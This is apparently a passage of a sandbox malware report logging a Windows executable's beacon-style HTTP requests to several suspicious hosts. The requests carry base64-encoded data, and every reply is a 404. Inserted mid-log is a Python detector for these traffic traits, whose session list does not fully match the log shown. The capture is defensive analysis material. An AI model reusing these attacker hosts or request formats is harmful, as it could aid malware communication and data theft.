                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              3 | 192.168.2.5 | 58648 | 89.58.49.1 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:30:04.109462023 CEST | 1779 | OUT | POST /xcfw/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.freepicture.online
                              Origin: http://www.freepicture.online
                              Referer: http://www.freepicture.online/xcfw/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2b 6a 53 70 39 30 77 37 5a 31 64 36 72 71 6d 31 34 35 56 6c 4d 72 42 4a 79 53 64 30 33 47 51 2f 48 6a 62 4d 32 6c 51 44 30 34 63 63 37 4b 6d 30 5a 4c 2f 47 47 58 76 6d 49 53 71 49 4b 42 31 39 74 43 6f 36 56 79 52 70 69 69 2f 46 42 64 35 4d 66 74 4c 62 6d 69 66 4d 46 43 78 48 33 61 6c 46 69 33 55 34 65 47 55 52 77 41 77 4a 38 68 48 5a 54 31 4b 2f 31 49 51 56 58 65 55 6c 6a 4e 2b 44 49 56 34 58 61 6e 52 6e 52 72 58 6e 71 49 78 64 55 6e 6a 56 6a 61 44 52 6e 44 77 63 2b 48 65 4f 6b 38 4a 50 79 68 52 42 39 72 36 6e 42 67 57 33 4e 2f 47 52 7a 38 47 44 39 42 79 78 6b 79 6c 30 63 31 63 47 65 37 6a 71 5a 6e 45 72 6f 6a 56 63 43 67 79 44 65 4c 71 57 34 4d 36 79 2b 70 34 34 52 51 4a 63 33 31 6a 65 4e 4c 38 54 72 79 4c 76 35 31 6b 6f 78 50 62 51 66 4c 6f 73 5a 7a 32 68 72 37 4c 55 5a 4a 54 68 55 4c 4e 43 49 41 34 48 59 6b 75 48 45 34 41 6e 2f 4d 33 36 55 56 61 69 61 58 4a 2b 62 70 65 4a 49 37 6d 38 78 39 76 43 4f 45 4e 34 45 4f 36 6e 51 75 46 77 6e 4f 32 43 41 42 6b [TRUNCATED]
                              Data Ascii: bX=Wh+VGNuLBIYa+jSp90w7Z1d6rqm145VlMrBJySd03GQ/HjbM2lQD04cc7Km0ZL/GGXvmISqIKB19tCo6VyRpii/FBd5MftLbmifMFCxH3alFi3U4eGURwAwJ8hHZT1K/1IQVXeUljN+DIV4XanRnRrXnqIxdUnjVjaDRnDwc+HeOk8JPyhRB9r6nBgW3N/GRz8GD9Byxkyl0c1cGe7jqZnErojVcCgyDeLqW4M6y+p44RQJc31jeNL8TryLv51koxPbQfLosZz2hr7LUZJThULNCIA4HYkuHE4An/M36UVaiaXJ+bpeJI7m8x9vCOEN4EO6nQuFwnO2CABka0dAYbWa8TXvCpGx28ua43RY2bc4WhMOHZXeDqXFiBUbRODahwCN34K+hxYcFmLUPii0pJTHQVsLfiRFq6gi7CLrMD0CLnt1cNulbG0h7AKIA+iPYhymTWcaDpMHl1elbnHpIC+6exNj2O3gw7F1moDwlzt0AGg5S4PxNU1GeBC8OeJ58Uf9a2PU9wrncY85OkxPfkDueg2vFKwbRVU/PDl6FnZcVjkQ8MU0PfCSzCSh1F2H6Dtx47fop1vbtCfVpuY+94l2rRp7t65lje1FmhbDdhALR0I/3ILNd9t/b/5IQiyPj46B+FkOscJV3HvmMYeRZ9TfRoNknS5ywH7cu/Sd4QfErTcvLri/Wh6JVyPv0QG43hU165ulJjW6tGxUIeKleKwtn+M++BBa2ZfonknpBuImQtSYRoo4m7qM0LrdL/KJTYjnalVfnPtt4micvP+3KXWuyQuIFqMRkHxT/3+XFMdlpx26dFoJ+xUTIG7Ou8O5ichg+Xrkl5x5En9VFTU5W+L9xsmlUIy6nmuTWpKEHRE+esCwxeewQa6MUZ1OmlTzobwSDYoTi2AU4K+D/CukU8aEJZJWDVTjTsDxHMfV1Kr0q9y14gjoZYgEafOvZBP/bGSAK9K5FGwA+Ca46R1IKwjbbnoHJMBu3VmUrbYicHN+Wc+F/M [TRUNCATED]
                              Sep 16, 2024 09:30:04.733069897 CEST | 360 | IN | HTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:30:04 GMT
                              Server: Apache
                              Content-Length: 196
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              4 | 192.168.2.5 | 58649 | 89.58.49.1 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:30:06.738957882 CEST | 468 | OUT | GET /xcfw/?bX=bjW1F6zberoR1D3bw3FdYWJ+vrSF97RpHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFA2CDhFv5wQZ64tx6dBz0c4KNQxRUIYxJE7HIG/DzEWEHYrw==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.freepicture.online
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:30:07.474097967 CEST | 360 | IN | HTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:30:07 GMT
                              Server: Apache
                              Content-Length: 196
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              5 | 192.168.2.5 | 58650 | 154.23.184.240 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:30:20.836724997 CEST | 715 | OUT | POST /p39s/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.hm62t.top
                              Origin: http://www.hm62t.top
                              Referer: http://www.hm62t.top/p39s/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 63 6f 68 45 76 31 4f 2f 71 41 6a 66 4d 41 59 76 34 57 39 52 38 6c 53 70 4a 62 74 48 72 59 61 35 76 64 67 46 76 32 64 48 49 5a 33 4f 77 33 54 4c 45 2f 54 41 41 76 70 50 4c 2f 47 49 41 38 34 30 4f 36 76 71 38 73 30 73 62 4e 44 34 6a 7a 33 48 51 43 65 66 61 54 32 6a 32 33 67 5a 67 66 79 79 50 7a 63 59 56 6c 48 48 4b 69 47 76 52 62 39 4b 6f 5a 61 56 4c 45 4f 4a 43 4f 64 4c 32 76 2b 35 49 56 61 39 69 50 52 55 72 54 74 76 5a 7a 72 56 61 35 52 4d 64 79 6b 52 66 7a 4e 76 72 2f 46 56 75 48 41 54 63 7a 73 6b 46 79 41 45 54 57 67 78 7a 4c 68 62 35 46 69 2f 37 63 3d
                              Data Ascii: bX=4PVtP2BQg8qzhcohEv1O/qAjfMAYv4W9R8lSpJbtHrYa5vdgFv2dHIZ3Ow3TLE/TAAvpPL/GIA840O6vq8s0sbND4jz3HQCefaT2j23gZgfyyPzcYVlHHKiGvRb9KoZaVLEOJCOdL2v+5IVa9iPRUrTtvZzrVa5RMdykRfzNvr/FVuHATczskFyAETWgxzLhb5Fi/7c=
                              Sep 16, 2024 09:30:21.735294104 CEST | 312 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:30:21 GMT
                              Content-Type: text/html
                              Content-Length: 148
                              Connection: close
                              ETag: "66a8e223-94"
                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              6 | 192.168.2.5 | 58651 | 154.23.184.240 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:30:23.650276899 CEST | 735 | OUT | POST /p39s/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.hm62t.top
                              Origin: http://www.hm62t.top
                              Referer: http://www.hm62t.top/p39s/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 38 34 68 44 4e 64 4f 33 71 41 6b 61 4d 41 59 6d 59 57 35 52 37 74 53 70 49 50 44 48 65 41 61 35 4e 56 67 45 74 65 64 47 49 5a 33 46 51 33 53 47 6b 2f 45 41 41 69 55 50 4b 54 47 49 41 6f 34 30 50 4b 76 72 50 45 31 74 4c 4e 42 30 44 7a 31 4a 77 43 65 66 61 54 32 6a 32 53 46 5a 67 58 79 79 66 6a 63 65 78 78 47 45 4b 69 48 6d 78 62 39 64 34 5a 57 56 4c 45 6f 4a 42 4b 6e 4c 31 58 2b 35 4e 35 61 7a 54 50 53 64 72 54 72 78 70 79 58 57 61 73 4f 41 2b 2b 62 65 70 43 51 38 61 54 62 51 59 71 71 4a 2b 37 45 33 6c 65 34 55 41 65 58 67 44 71 49 42 61 56 53 68 73 4b 62 61 34 45 70 50 42 69 56 62 72 35 67 6e 76 65 64 76 48 62 48
                              Data Ascii: bX=4PVtP2BQg8qzh84hDNdO3qAkaMAYmYW5R7tSpIPDHeAa5NVgEtedGIZ3FQ3SGk/EAAiUPKTGIAo40PKvrPE1tLNB0Dz1JwCefaT2j2SFZgXyyfjcexxGEKiHmxb9d4ZWVLEoJBKnL1X+5N5azTPSdrTrxpyXWasOA++bepCQ8aTbQYqqJ+7E3le4UAeXgDqIBaVShsKba4EpPBiVbr5gnvedvHbH
                              Sep 16, 2024 09:30:24.552614927 CEST | 312 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:30:24 GMT
                              Content-Type: text/html
                              Content-Length: 148
                              Connection: close
                              ETag: "66a8e223-94"
                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


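Every session above has the same shape: one short path per host (/w9nd/, /xcfw/, /p39s/), a single short parameter carrying a long base64-looking value (in the query string on GET, as a form body on POST), an Android Chrome User-Agent emitted by a Windows executable under Program Files, a Referer that points at the request's own URL, and POST bodies of 203, 223 and 1239 bytes sent to each host in turn even though every response is a 404. The Python below is an added example, not Joe Sandbox output or code: it parses the requests copied from sessions 0 and 1 (plus a constructed benign request as a negative control), reports which of those traits each request shows, and checks the session list for the growing POST sizes. The path-length bounds, the 40-character minimum for the blob and the threshold of three traits are this example's assumptions.

```python
import re
from urllib.parse import urlsplit

# Owner of every session in the report (from the session tables above).
PROCESS = (r"C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH"
           r"\WwOlfblnYaWmLq.exe")
UA = ("Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36")

# GET_REQ and POST_REQ are copied from sessions 0 and 1 of the report; BENIGN_REQ is
# constructed for this example as a negative control and is not from the capture.
GET_REQ = (
    "GET /w9nd/?bX=9dRK0h7YIJsGSRni8bUofvVG/PCfrhvBPHBwJCn+XP7nQ6BgyCo2QTTghBp7CnsQKe5GALi32E4BE"
    "+loUVZtsDQ0fsSUzmOhwAoGTPqsz12jBMJXijf4AdQEcpHIqPDRWg==&RFRd_=tFLD HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Accept-Language: en-US,en\r\nHost: www.726075.buzz\r\nConnection: close\r\n"
    f"User-Agent: {UA}\r\n\r\n"
)
POST_REQ = (
    "POST /xcfw/ HTTP/1.1\r\nHost: www.freepicture.online\r\n"
    "Origin: http://www.freepicture.online\r\nReferer: http://www.freepicture.online/xcfw/\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nConnection: close\r\n"
    f"Content-Length: 203\r\nCache-Control: max-age=0\r\nUser-Agent: {UA}\r\n\r\n"
    "bX=Wh+VGNuLBIYa/AKpw0M7Old9uqm1yZVpMrFJyWE/3V8/HUfM2HID4YccsamwXr+dGXLAIXWyKD59thQ6CGxuqy/"
    "DFd5TftKBmiPTFC1h3a9FiCg4XWUW1AwJ8hHVT1K61IY7Xax4i+mDIx0XJWRkXrXrnow+ZESlqKTNoQRCrEqOrdhn9jVR"
    "7qivByf8C7revvWFp28="
)
BENIGN_REQ = (
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nReferer: http://www.example.com/\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/128.0 Safari/537.36\r\n\r\n"
)

# (session, host, method, path, Content-Length or None) for the eight sessions shown above.
SESSIONS = [
    (0, "www.726075.buzz", "GET", "/w9nd/", None),
    (1, "www.freepicture.online", "POST", "/xcfw/", 203),
    (2, "www.freepicture.online", "POST", "/xcfw/", 223),
    (3, "www.freepicture.online", "POST", "/xcfw/", 1239),
    (4, "www.freepicture.online", "GET", "/xcfw/", None),
    (5, "www.hm62t.top", "POST", "/p39s/", 203),
    (6, "www.hm62t.top", "POST", "/p39s/", 223),
    (7, "www.hm62t.top", "POST", "/p39s/", 1239),
]

SHORT_PATH = re.compile(r"/[a-z0-9]{3,6}/")         # /w9nd/, /xcfw/, /p39s/; 3-6 chars is an assumption
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # long base64 value, optional padding


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {"method": method, "path": parts.path, "query": parts.query,
            "headers": headers, "body": body}


def form_params(encoded):
    """Split k=v&k=v without decoding: urllib's parse_qs would turn base64 '+' into spaces."""
    params = {}
    for pair in filter(None, encoded.split("&")):
        key, _, value = pair.partition("=")
        params[key] = value
    return params


def request_indicators(req, process):
    """Names of the traffic traits visible in the capture above that this request shows."""
    hits = []
    if SHORT_PATH.fullmatch(req["path"]):
        hits.append("short_random_path")
    params = form_params(req["query"] if req["method"] == "GET" else req["body"])
    if any(len(k) <= 4 and B64_BLOB.fullmatch(v) for k, v in params.items()):
        hits.append("base64_blob_in_short_param")
    if "android" in req["headers"].get("user-agent", "").lower() and process.lower().endswith(".exe"):
        hits.append("mobile_user_agent_from_windows_exe")
    host = req["headers"].get("host", "")
    if req["headers"].get("referer") == f"http://{host}{req['path']}":
        hits.append("self_referencing_referer")
    return hits


def is_suspicious(raw, process=PROCESS, threshold=3):
    return len(request_indicators(parse_request(raw), process)) >= threshold


def post_size_ladders(sessions):
    """Per (host, path): Content-Length of successive POSTs, kept only when they never shrink."""
    sizes = {}
    for _, host, method, path, length in sessions:
        if method == "POST":
            sizes.setdefault((host, path), []).append(length)
    return {k: v for k, v in sizes.items() if len(v) >= 2 and v == sorted(v)}


if __name__ == "__main__":
    for label, raw in ("GET", GET_REQ), ("POST", POST_REQ), ("benign", BENIGN_REQ):
        print(label, request_indicators(parse_request(raw), PROCESS))
    print(post_size_ladders(SESSIONS))
```

The two per-request checks that carry the most weight are the process-to-User-Agent mismatch and the self-referencing Referer, because both need the originating process from the session table and cannot be judged from the wire alone; the 203/223/1239 ladder is the host-level corroboration, and it repeats on both hosts that resolved even though neither ever answered anything but 404.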
                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              7 | 192.168.2.5 | 58652 | 154.23.184.240 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:30:26.199429035 CEST | 1752 | OUT | POST /p39s/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.hm62t.top
                              Origin: http://www.hm62t.top
                              Referer: http://www.hm62t.top/p39s/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 38 34 68 44 4e 64 4f 33 71 41 6b 61 4d 41 59 6d 59 57 35 52 37 74 53 70 49 50 44 48 64 67 61 35 2b 4e 67 47 4d 65 64 55 59 5a 33 47 51 33 50 47 6b 2f 5a 41 44 54 54 50 4b 50 57 49 43 51 34 33 74 79 76 69 61 77 31 6b 4c 4e 42 70 54 7a 34 48 51 43 4c 66 61 69 2b 6a 32 69 46 5a 67 58 79 79 61 6e 63 64 6c 6c 47 49 71 69 47 76 52 61 38 4b 6f 59 2f 56 4c 64 54 4a 41 2f 59 49 46 33 2b 36 74 70 61 78 6c 62 53 53 72 54 70 77 70 79 50 57 61 77 72 41 2b 6a 71 65 74 4b 36 38 5a 7a 62 54 70 76 4c 54 4b 4b 62 68 32 53 44 62 44 53 57 79 43 66 71 4a 70 78 4b 73 4f 47 4c 66 72 51 30 4d 31 69 48 65 70 59 4e 6c 4a 69 76 67 44 69 66 4e 47 55 2b 50 54 6b 55 63 32 61 53 31 4a 4f 49 6f 6a 66 67 4e 65 4f 47 65 39 4e 57 43 6a 66 6e 57 6f 6b 6c 50 53 70 46 6d 6e 6d 6d 76 48 66 4a 53 54 34 54 6c 39 58 33 53 4e 53 46 38 30 59 72 68 53 47 7a 33 55 37 2b 35 32 54 79 57 38 33 31 47 5a 47 71 6d 39 74 77 79 6e 32 6a 34 46 7a 31 37 31 2f 31 6d 61 78 63 4c 79 30 72 4d 44 66 4b 44 5a 2b [TRUNCATED]
                              Data Ascii: bX=[TRUNCATED]
                              Sep 16, 2024 09:30:27.097513914 CEST | 312 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:30:26 GMT
                              Content-Type: text/html
                              Content-Length: 148
                              Connection: close
                              ETag: "66a8e223-94"
                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              8 | 192.168.2.5 | 58653 | 154.23.184.240 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:30:28.745003939 CEST | 459 | OUT | GET /p39s/?RFRd_=tFLD&bX=1N9NMDNpm9Czos0sMOBPjc8XecgVvOOrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV8zKUy6S3cHQGYd//xgFiAZgSqx5KudB9OKNvEpiaWMoszOg== HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.hm62t.top
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:30:29.659447908 CEST | 312 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:30:29 GMT
                              Content-Type: text/html
                              Content-Length: 148
                              Connection: close
                              ETag: "66a8e223-94"
                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              9 | 192.168.2.5 | 58654 | 85.159.66.93 | 80 | 728 | C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:30:34.790605068 CEST | 748 | OUT | POST /k2vl/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.golbasi-nakliyat.xyz
                              Origin: http://www.golbasi-nakliyat.xyz
                              Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
